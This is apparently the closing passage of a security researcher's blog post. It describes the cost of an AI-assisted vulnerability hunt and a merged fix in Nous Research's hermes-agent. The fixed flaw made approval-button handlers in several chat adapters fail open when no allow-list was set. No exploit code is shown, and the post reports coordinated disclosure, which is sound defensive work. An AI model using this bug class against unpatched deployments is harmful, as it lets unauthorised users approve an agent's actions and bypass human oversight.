Here is the honest cost. The work that scales with the size of the codebase, the ranking and reading and the adversarial verify across 1,342 hits and 126 leads, runs on the local 27B. That is the near-free part: the metered cloud spend for a hunt comes to about $1.62, and even that is an accounting figure, because those stages ran on the GPU and cost electricity. The frontier layer on top, the orchestration and the deep audit that built and confirmed the two bugs, came to about 20 agents and a couple million tokens for the whole engagement. It is the only part with a real per-token price, and it stayed small enough to trip a usage limit and resume on its own.

None of this needed a frontier lab's budget. It needed a near-free local reader doing the volume and the triage, a frontier model only for the final audit, an adversarial verifier allowed to kill the findings feeding it, and the discipline to check scope against the policy that is current rather than the one on disk. The two bugs matter, but the rig that found them is reusable: I have already pointed it at other open-source projects, and I will write those up as I go.

Update — the gateway fix is in (2026-06-07)

Nous merged the fix for finding 13 in PR #41226. The approval-button handlers now fail closed when no allow-list is set: they deny by default unless GATEWAY_ALLOW_ALL_USERS is set as an explicit opt-in. That is the shape I had recommended, the Telegram fallback mirrored across the other adapters, and it ships with regression tests that pin the fail-closed behaviour so it cannot drift back.

Two things in the merged patch are worth being straight about, because neither lines up with my writeup exactly.

It fixed an adapter I never tested. My finding covered Slack, Matrix, and Feishu; the patch covers Slack, Feishu, and Discord. Discord's button-approval path had the same empty-allow-list fail-open, and I never looked at it. I found the class; the maintainer found one more instance of it than I had.

Matrix had already moved. Of the three adapters I flagged, the patch only needed Slack and Feishu, because Matrix had been brought fail-closed somewhere between the commit I audited (b62af47da) and the one the patch branched from; its reaction handler denies by default on its own now. So three adapters were fail-open at my audit commit, and by the time the fix landed it was the two the PR names, plus the Discord path I had missed.

The patch leaves the second in-scope finding alone. It is untouched by #41226 and still open as far as I can see, so nothing changes there: it stays held until its own fix ships.

The hermes-agent source was read but not modified, on NousResearch/hermes-agent at commit b62af47da. Severities are my own estimates, pending vendor triage. Finding 13 was reproduced as BYPASS CONFIRMED in the isolated container described above and reported to Nous Research through coordinated disclosure, along with a second in-scope finding held until its fix ships.

